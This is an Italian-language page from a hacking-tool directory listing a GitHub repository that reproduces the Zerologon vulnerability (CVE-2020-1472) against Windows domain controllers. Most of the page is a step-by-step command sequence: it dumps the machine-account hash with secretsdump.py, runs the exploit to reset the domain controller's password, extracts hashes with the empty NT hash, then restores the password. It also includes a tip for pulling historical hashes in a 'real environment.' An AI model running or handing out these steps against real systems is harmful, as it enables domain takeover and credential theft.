Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-1472 — Procedura di riproduzione di CVE-2020-1472 | Kitploit
Strumenti/GitHubGitHub/naxg/cve-2020-1472
Password CrackingRicognizioneAnalisi delle VulnerabilitàExploitPost-ExploitPenetration Testing
GitHubnaxg/cve-2020-1472

CVE-2020-1472

Procedura di riproduzione di CVE-2020-1472

Vedi Repository
4165 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dopo la replica ho notato un piccolo bug: al riavvio la schermata di login resta bloccata per un po'. Non so se capiti solo a me. (Usare con cautela in ambienti reali.)

In un ambiente reale, puoi usare secretsdump.py con le opzioni -use-vss e -history per recuperare gli hash storici.

Primo passo

root@kitploit:~
pip3 install -r requirements.txt

Visualizza hash

root@kitploit:~
secretsdump.py molecule-labs.com/administrator:[email protected] -just-dc-user 'AD$'

images

Attacco

root@kitploit:~
python3 CVE-2020-1472.py AD AD$ 192.168.175.132

images

Interroga hash del controller di dominio

root@kitploit:~
secretsdump.py molecule-labs.com/'AD$'@192.168.175.132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

images

Ripristina hash

root@kitploit:~
python3 reinstall_original_pw.py AD 192.168.175.132 061e8e521872fa93a2f8d89ca0683145

images

Interroga hash dopo ripristino

root@kitploit:~
secretsdump.py molecule-labs.com/administrator:[email protected] -just-dc-user 'AD$'

images

Fonti degli script

https://github.com/blackarrowsec/redteam-research

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/SecuraBV/CVE-2020-1472

Scarica lo strumento